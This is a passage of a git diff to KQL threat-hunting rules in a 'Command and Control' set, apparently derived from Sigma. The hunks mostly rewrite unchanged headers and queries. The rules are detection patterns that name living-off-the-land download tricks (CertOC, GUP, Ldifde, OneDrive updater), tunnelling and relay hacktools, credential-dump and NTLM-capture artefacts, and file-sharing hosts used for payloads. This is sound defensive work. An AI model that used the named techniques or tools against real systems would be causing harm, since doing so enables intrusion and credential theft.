Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql index cdcad4ed..94652062 100644 --- a/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql +++ b/KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download From IP Based URL Via CertOC.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-18 -// Level: high -// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.execution, attack.t1105 - -DeviceProcessEvents +// Title: File Download From IP Based URL Via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: high +// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.execution, attack.t1105 + +DeviceProcessEvents | where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql index 63dcdf7c..79f3f0e3 100644 --- a/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql +++ b/KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql @@ -1,12 +1,12 @@ -// Title: File Download Using Notepad++ GUP Utility -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-10 -// Level: high -// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Other parent processes other than notepad++ using GUP that are not currently identified - -DeviceProcessEvents +// Title: File Download Using Notepad++ GUP Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-10 +// Level: high +// Description: Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Other parent processes other than notepad++ using GUP that are not currently identified + +DeviceProcessEvents | where ((ProcessCommandLine contains " -unzipTo " and ProcessCommandLine contains "http") and (FolderPath endswith "\\GUP.exe" or ProcessVersionInfoOriginalFileName =~ "gup.exe")) and (not(InitiatingProcessFolderPath endswith "\\notepad++.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql index 21f6ab16..c568e3e0 100644 --- a/KQL/rules/Command and Control/file_download_via_certoc_exe.kql +++ b/KQL/rules/Command and Control/file_download_via_certoc_exe.kql @@ -1,10 +1,10 @@ -// Title: File Download via CertOC.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-16 -// Level: medium -// Description: Detects when a user downloads a file by using CertOC.exe -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: File Download via CertOC.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-16 +// Level: medium +// Description: Detects when a user downloads a file by using CertOC.exe +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "-GetCACAPS" and ProcessCommandLine contains "http") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/Command and Control/finger_exe_execution.kql index 4094dc43..c5a6bfc0 100644 --- a/KQL/rules/Command and Control/finger_exe_execution.kql +++ b/KQL/rules/Command and Control/finger_exe_execution.kql @@ -1,14 +1,14 @@ -// Title: Finger.EXE Execution -// Author: Florian Roth (Nextron Systems), omkar72, oscd.community -// Date: 2021-02-24 -// Level: high -// Description: Detects execution of the "finger.exe" utility. -// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. -// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Admin activity (unclear what they do nowadays with finger.exe) - -DeviceProcessEvents +// Title: Finger.EXE Execution +// Author: Florian Roth (Nextron Systems), omkar72, oscd.community +// Date: 2021-02-24 +// Level: high +// Description: Detects execution of the "finger.exe" utility. +// Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. +// Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Admin activity (unclear what they do nowadays with finger.exe) + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "finger.exe" or FolderPath endswith "\\finger.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql index a55fccd8..68d12ee8 100644 --- a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql +++ b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql @@ -1,14 +1,14 @@ -// Title: GoToAssist Temporary Installation Artefact -// Author: frack113 -// Date: 2022-02-13 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. -// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. -// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceFileEvents +// Title: GoToAssist Temporary Installation Artefact +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. +// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. +// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceFileEvents | where FolderPath contains "\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql index 02330050..746643db 100644 --- a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql +++ b/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql @@ -1,12 +1,12 @@ -// Title: Gzip Archive Decode Via PowerShell -// Author: Hieu Tran -// Date: 2023-03-13 -// Level: medium -// Description: Detects attempts of decoding encoded Gzip archives via PowerShell. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1132.001 -// False Positives: -// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions - -DeviceProcessEvents +// Title: Gzip Archive Decode Via PowerShell +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: medium +// Description: Detects attempts of decoding encoded Gzip archives via PowerShell. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1132.001 +// False Positives: +// - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions + +DeviceProcessEvents | where ProcessCommandLine contains "GZipStream" and ProcessCommandLine contains "::Decompress" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql index c65ddad2..fc4713e6 100644 --- a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql +++ b/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - Htran/NATBypass Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-12-27 -// Level: high -// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090, attack.s0040 - -DeviceProcessEvents +// Title: HackTool - Htran/NATBypass Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-12-27 +// Level: high +// Description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090, attack.s0040 + +DeviceProcessEvents | where (ProcessCommandLine contains ".exe -tran " or ProcessCommandLine contains ".exe -slave ") or (FolderPath endswith "\\htran.exe" or FolderPath endswith "\\lcx.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql index 54836e41..fbb12d87 100644 --- a/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql +++ b/KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql @@ -1,12 +1,12 @@ -// Title: HackTool - Inveigh Execution Artefacts -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-24 -// Level: critical -// Description: Detects the presence and execution of Inveigh via dropped artefacts -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: HackTool - Inveigh Execution Artefacts +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-24 +// Level: critical +// Description: Detects the presence and execution of Inveigh via dropped artefacts +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith "\\Inveigh-Log.txt" or FolderPath endswith "\\Inveigh-Cleartext.txt" or FolderPath endswith "\\Inveigh-NTLMv1Users.txt" or FolderPath endswith "\\Inveigh-NTLMv2Users.txt" or FolderPath endswith "\\Inveigh-NTLMv1.txt" or FolderPath endswith "\\Inveigh-NTLMv2.txt" or FolderPath endswith "\\Inveigh-FormInput.txt" or FolderPath endswith "\\Inveigh.dll" or FolderPath endswith "\\Inveigh.exe" or FolderPath endswith "\\Inveigh.ps1" or FolderPath endswith "\\Inveigh-Relay.ps1" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql index 5e160de7..77484182 100644 --- a/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql +++ b/KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql @@ -1,12 +1,12 @@ -// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-27 -// Level: high -// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-27 +// Level: high +// Description: Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath endswith ":\\windows\\temp\\sam.tmp" or FolderPath endswith ":\\windows\\temp\\sec.tmp" or FolderPath endswith ":\\windows\\temp\\sys.tmp" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql index 3a3ced1f..c3d5e371 100644 --- a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql +++ b/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SharpChisel Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-05 -// Level: high -// Description: Detects usage of the Sharp Chisel via the commandline arguments -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - SharpChisel Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-05 +// Level: high +// Description: Detects usage of the Sharp Chisel via the commandline arguments +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\SharpChisel.exe" or ProcessVersionInfoProductName =~ "SharpChisel" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql index 03be964c..1db7a2b1 100644 --- a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql +++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SILENTTRINITY Stager DLL Load -// Author: Aleksey Potapov, oscd.community -// Date: 2019-10-22 -// Level: high -// Description: Detects SILENTTRINITY stager dll loading activity -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: HackTool - SILENTTRINITY Stager DLL Load +// Author: Aleksey Potapov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Detects SILENTTRINITY stager dll loading activity +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where InitiatingProcessVersionInfoFileDescription contains "st2stager" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql index ab5c4a75..a9f6c7d3 100644 --- a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql +++ b/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql @@ -1,12 +1,12 @@ -// Title: HackTool - SILENTTRINITY Stager Execution -// Author: Aleksey Potapov, oscd.community -// Date: 2019-10-22 -// Level: high -// Description: Detects SILENTTRINITY stager use via PE metadata -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - SILENTTRINITY Stager Execution +// Author: Aleksey Potapov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Detects SILENTTRINITY stager use via PE metadata +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessVersionInfoFileDescription contains "st2stager" \ No newline at end of file diff --git a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql index 1f59abde..120709f6 100644 --- a/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql +++ b/KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql @@ -1,12 +1,12 @@ -// Title: Hijack Legit RDP Session to Move Laterally -// Author: Samir Bousseaden -// Date: 2019-02-21 -// Level: high -// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Hijack Legit RDP Session to Move Laterally +// Author: Samir Bousseaden +// Date: 2019-02-21 +// Level: high +// Description: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Unlikely + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\mstsc.exe" and FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql index 8e81c6be..6b4d70a8 100644 --- a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql +++ b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql @@ -1,12 +1,12 @@ -// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE -// Author: @gott_cyber -// Date: 2022-09-02 -// Level: medium -// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105 -// False Positives: -// - Since the content of the files are unknown, false positives are expected - -DeviceProcessEvents +// Title: Import LDAP Data Interchange Format File Via Ldifde.EXE +// Author: @gott_cyber +// Date: 2022-09-02 +// Level: medium +// Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105 +// False Positives: +// - Since the content of the files are unknown, false positives are expected + +DeviceProcessEvents | where (ProcessCommandLine contains "-i" and ProcessCommandLine contains "-f") and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql index b5161330..1d275f65 100644 --- a/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql +++ b/KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql @@ -1,10 +1,10 @@ -// Title: Installation of TeamViewer Desktop -// Author: frack113 -// Date: 2022-01-28 -// Level: medium -// Description: TeamViewer_Desktop.exe is create during install -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 - -DeviceFileEvents +// Title: Installation of TeamViewer Desktop +// Author: frack113 +// Date: 2022-01-28 +// Level: medium +// Description: TeamViewer_Desktop.exe is create during install +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceFileEvents | where FolderPath endswith "\\TeamViewer_Desktop.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql index 612c4319..f6a7ead2 100644 --- a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql +++ b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql @@ -1,12 +1,12 @@ -// Title: Local Network Connection Initiated By Script Interpreter -// Author: frack113 -// Date: 2022-08-28 -// Level: medium -// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate scripts - -DeviceNetworkEvents +// Title: Local Network Connection Initiated By Script Interpreter +// Author: frack113 +// Date: 2022-08-28 +// Level: medium +// Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate scripts + +DeviceNetworkEvents | where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") \ No newline at end of file diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql index e4b55399..cd2f98f8 100644 --- a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql +++ b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql @@ -1,11 +1,11 @@ -// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download -// Author: frack113 -// Date: 2022-05-28 -// Level: high -// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any -// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceRegistryEvents +// Title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download +// Author: frack113 +// Date: 2022-05-28 +// Level: high +// Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any +// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceRegistryEvents | where RegistryKey contains "\\SOFTWARE\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC" \ No newline at end of file diff --git a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql index 138d524c..f8c8e76b 100644 --- a/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql +++ b/KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql @@ -1,12 +1,12 @@ -// Title: Mstsc.EXE Execution With Local RDP File -// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock -// Date: 2023-04-18 -// Level: low -// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Likely with legitimate usage of ".rdp" files - -DeviceProcessEvents +// Title: Mstsc.EXE Execution With Local RDP File +// Author: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock +// Date: 2023-04-18 +// Level: low +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Likely with legitimate usage of ".rdp" files + +DeviceProcessEvents | where ((ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql index 0ff75d09..bdc3d740 100644 --- a/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql +++ b/KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql @@ -1,12 +1,12 @@ -// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2018-08-30 -// Level: high -// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule. - -DeviceNetworkEvents +// Title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-08-30 +// Level: high +// Description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule. + +DeviceNetworkEvents | where (RemoteUrl endswith ".githubusercontent.com" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "dl.dropboxusercontent.com" or RemoteUrl endswith "ghostbin.co" or RemoteUrl endswith "glitch.me" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onrender.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "storjshare.io" or RemoteUrl endswith "supabase.co" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "workers.dev") and (InitiatingProcessFolderPath contains ":\\$Recycle.bin" or InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Default\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Fonts\\" or InitiatingProcessFolderPath contains ":\\Windows\\IME\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Tasks\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Temp\\" or InitiatingProcessFolderPath contains "\\config\\systemprofile\\" or InitiatingProcessFolderPath contains "\\Windows\\addins\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql index d3b1434f..2a539c84 100644 --- a/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql +++ b/KQL/rules/Command and Control/network_communication_initiated_to_portmap_io_domain.kql @@ -1,12 +1,12 @@ -// Title: Network Communication Initiated To Portmap.IO Domain -// Author: Florian Roth (Nextron Systems) -// Date: 2024-05-31 -// Level: medium -// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors -// MITRE Tactic: Command and Control -// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration -// False Positives: -// - Legitimate use of portmap.io domains - -DeviceNetworkEvents +// Title: Network Communication Initiated To Portmap.IO Domain +// Author: Florian Roth (Nextron Systems) +// Date: 2024-05-31 +// Level: medium +// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors +// MITRE Tactic: Command and Control +// Tags: attack.t1041, attack.command-and-control, attack.t1090.002, attack.exfiltration +// False Positives: +// - Legitimate use of portmap.io domains + +DeviceNetworkEvents | where RemoteUrl endswith ".portmap.io" \ No newline at end of file diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql index 3d8afe17..d7c11ee2 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql @@ -1,10 